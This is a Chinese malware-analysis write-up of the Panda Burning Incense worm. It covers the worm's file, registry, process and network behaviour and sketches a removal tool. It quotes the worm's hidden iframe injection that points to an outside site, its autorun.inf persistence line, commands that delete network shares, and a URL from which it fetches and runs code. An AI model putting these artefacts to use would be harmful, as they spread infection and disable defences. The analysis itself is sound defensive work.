标签：文件 exe 删除 熊猫 笔记 spo0lsv 烧香 注册表 病毒

熊猫烧香

分析病毒四步：

1. 提取样本，模拟手工查杀的方式去进行分析

2. 行为分析，使用监控工具行为分析

3. 详细分析：使用OD和IDA动静结合方式分析恶意代码，尽可能找出恶意代码行为，及实现步骤

4. 解决方案：报告和专杀工具

一般都是先中了病毒，再去杀毒，

提取样本第一时间手工清理或修复机器现场，之后再做分析

 

1．样本概况

1.1 样本信息

病毒名称: 熊猫烧香

所属家族：感染性病毒（Virus）/ 蠕虫病毒（Worm）

大小: 30001 bytes

修改时间: 2007年1月17日, 12:18:40

MD5: 512301C535C88255C9A252FDF70B7A03

SHA1: CA3A1070CFF311C0BA40AB60A8FE3266CFEFE870

CRC32: E334747C

病毒行为：

复制自身、感染PE文件、覆写PE文件、修改注册表自启动、结束杀软进程、删除杀软相关启动项。

 

1.2 测试环境及工具

测试环境：VMware　WorkStation 16 PRO

工具：PCHunter、火绒剑、IDA、OD、ExeinfoPE

1.3 分析目标

分析病毒永久驻留方式，感染的方式，网络连接，病毒的恶意行为。

2．具体行为分析

2.1 主要行为

熊猫烧香主要行为如下：

1. 文件操作：复制病毒、创建文件、感染文件等。

2. 注册表操作：自启动、创建注册表项、删除杀软注册表项、隐藏文件等。

3. 进程操作：遍历进程、跨进程读写、跨进程恢复线程、打开设备等。

4. 网络操作：连接局域网传播、访问门户网址、与木马网址通讯等

 

 

 

2.1.1 文件操作

1. 复制文件到C:\Windows\System32\drivers\spo0lsv.exe

2. 在各个目录创建了Desktop.ini 文件，里面保存的是病毒创建的日期。

3. 感染了大量文件，文件类型主要为exe和ini文件。

 

 

 

 

2.1.2 注册表操作

1.为自己创建了一个注册表项

HEKY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\spo0lsv_RASAPI32，在里面写入了很多信息,

 

2.病毒开机自启动，在

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\设置启动项 C:\WIndows\system32\drivers\spo0lsvs.exe。

 

3.通过

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue隐藏文件。

 

4. 通过删除

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 下的项来关闭杀毒软件自启动。

 

5. 修改IE的代理服务和连接设置。

 

2.1.3 进程操作

1. 遍历进程，可能是查找是否有杀软。

2. 打开和创建进程，启动C:\Windows\system32\drivers\spo0lsv.exe

3. 跨进程读写内存，读写C:\Windows\system32\drivers\spo0lsv.exe的内存

4. 跨进程恢复线程，恢复C:\Windows\system32\drivers\spo0lsv.exe的线程，让其运行

5. 打开设备，打开的是Nsi和Afd

6. 查找窗口

 

2.1.4 网咯操作

1. 连接了局域网的一些地址，主要通过139、445端口连接。

 

2. 访问了一些门户网站：www.tom.com、www.163.com等

 

3.与一些网址进行数据交换，数据经过了加密传输。

 

2.1.5 威胁行为总结

通过分析监控的日志以及人肉之后，可以分析出样本的恶意行为：

1. 自我复制样本到C盘，C:\Windows\system32\driver\目录下，启动C:\Windows\system32\drivers\spo0lsv.exe（样本）。

2. 在每一个目录下创建了Desktop.ini文件，里面存放的是当前日期。

3. 在C盘根目录下创建了autorun.inf文件，里面制定了自启动的文件为根目录下的setup.exe（样本）。

4. 对程序目录下的exe进行了感染，图标变为exe，打开exe时，自动打开病毒。

5. 设置注册表启动项为C:\Windows\system32\drivers\spo0lsv.exe（样本）

6. 设置注册表键值HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue，隐藏文件不显示。

7. 将注册表中杀毒软件启动项全部删除。

8. 自己创建了一个注册表的项HEKY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\spo0lsv_RASAPI32，在其中写入了很多信息。

9. 修改注册表项IE浏览器的代理和连接设置。

10. 连接局域网的一些地址，访问外网的一些地址。

11. 使用cmd命令关闭网络共享。cmd.exe /c net share C$/del /y 和 cmd.exe /c net share admin$ /del /y

2.2 恶意代码分析

2.1恶意代码树结构图

熊猫烧香主要分为三个模块：

1. 自我保护和自我复制

2. 感染文件

3. 病毒自我保护

 

2.2 恶意程序的代码分析片段

2.1.1 病毒主逻辑

在程序开始时比较字符串是否相等，不相等则退出，接着依次执行自我复制和自我保护、感染全盘文件和病毒自我保护。

 

 

 

 

 

2.1.2 自我复制

自我复制和自我保护功能如下图所示：

 

 

1. 遍历进程”spo0lsv.exe”，通过创建进程快照方式遍历进程，然后判断是否是”spo0lsv.exe”，是的话就结束进程。

 

 

2. 若是病毒母体，则将自身拷贝至”C:\Windows\system32\drivers\spo0lsv.exe”中。然后运行该文件，并退出本程序。

 

 

 

3. 若不是病毒源程序：将驱动目录的病毒程序spo0lsv.exe删除，再将自身写入获取drivers目录的spo0lsv.exe程序中，然后退出进程，再启动获取drivers目录下的spo0lsv.exe.

 

 

2.1.3 感染文件

病毒感染文件的主要逻辑如图所示：

 

 

1. 全盘感染

1.1 遍历全盘，找出存在的盘符并保存。

 

 

1.2 遍历目录排除特殊文件夹，并生成感染标识Desktop_.ini文件，里面保存当前时间

 

 

 

 

1.3 对EXE、SCR、PIF、COM后缀的文件使用函数sub_407F00进行感染,，主要是将使用病毒文件替换源文件，然后再将源文件添加到病毒文件中。

 

 

1.4 对htm、html、asp、php、jsp、aspx后缀的文件，使用sub_4079CC函数进行感染，主要是将<iframe src=http://www.ac86.cn/66/index.htm width=”0”height=”0”></iframe>写入文件末尾。

 

2. 定时器方式感染

2.1 设置一个定时器，判断C盘根路径下setup.exp和autorun.inf文件是否存在，没有则创建这两个文件，将病毒自身复制到setup.exe中，在autorun.inf中写入”[AutoRun] noPEN=setup.exe shell\Auto\command =setup.exe ”

 

 

3. 局域网感染

3.1建立TCP客户端，然后当病毒发现能连接到到局域网主机的139端口或445端口时，匹配管理员弱口令密码，连接成功后将病毒上传。

 

2.1.4 病毒自我保护保护

熊猫烧香通过结束杀毒软件、设置自启动、隐藏文件、从网页下载代码并执行、删除网络共享、停止和删除杀软服务，删除杀软注册表启动项的方式对自己进行保护。

 

 

1. 结束杀软、自启动和隐藏文件

1.通过访问令牌提升权限。

 

 

2. 通过遍历窗口，然后发送WM_QUIT的方式结束杀毒软件。

 

 

3. 通过遍历进程结束杀毒软件。

 

4. 通过注册表设置自启动和隐藏文件

 

2. 从网页读取病毒源码

从网站http：//wangma.9966.org/down.txt读取病毒源码并运行。

 

3. 删除网络共享

使用以下几条命令来删除网络共享：

1. cmd.exe /c net share $ /del /y

2. cmd.exe /c net share admin$ /del /y

 

4.停止和删除杀软服务，删除杀软注册表启动项

停止杀软服务，删除杀软服务和删除杀软注册表启动项

 

3．解决方案

3.1 提取病毒的特征，利用杀毒软件查杀

病毒特征：

1. 字符串:

”whboy”、”xboy”、”Desktop_.ini”、”spo0lsv.exe”等

2. 网络地址：

http：//wangma.9966.org/down.txt

3.2工具查杀步骤及查杀思路

根据刚刚的详细分析可以针对该病毒行为，编写专杀工具来杀掉熊猫烧香病毒和恢复被感染文件，恢复被篡改的注册表项。思路如下，详细代码请见附录

3.1.1 专杀工具编写思路

1. 结束病毒进程

由之前分析可知病毒进程名称为spo0lsv.exe，故通过遍历进程的方式，获取进程名称进行比对，然后结束进程即可。

 

2. 恢复注册表

熊猫烧香对注册表的更改主要是设置熊猫烧香开机启动、修改文件隐藏属性和创建了一个熊猫烧香的注册表项。故我们针对其进行修改即可，删除熊猫烧香的自启动，改正文件隐藏属性和删除熊猫烧香创建的注册表项。

 

3. 删除病毒文件

删除熊猫烧香创建的一些感染标识文件、驱动目录下的病毒文件和根路径下的setup.exe和autorun.inf文件.

 

4. 恢复被

 

感染文件

根据被感染文件的类型恢复被感染文件，对于exe、scr、com和pif类文件，先获取文件大小，然后从文件末尾读出感染标识中存储的源文件的大小，再将源文件读出并写回即可恢复。对于htm、html、asp、php、jsp和aspx文件，只需将文件末尾的网址删除即可。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

标签：文件,exe,删除,熊猫,笔记,spo0lsv,烧香,注册表,病毒
来源： https://www.cnblogs.com/Link-Start/p/15469132.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。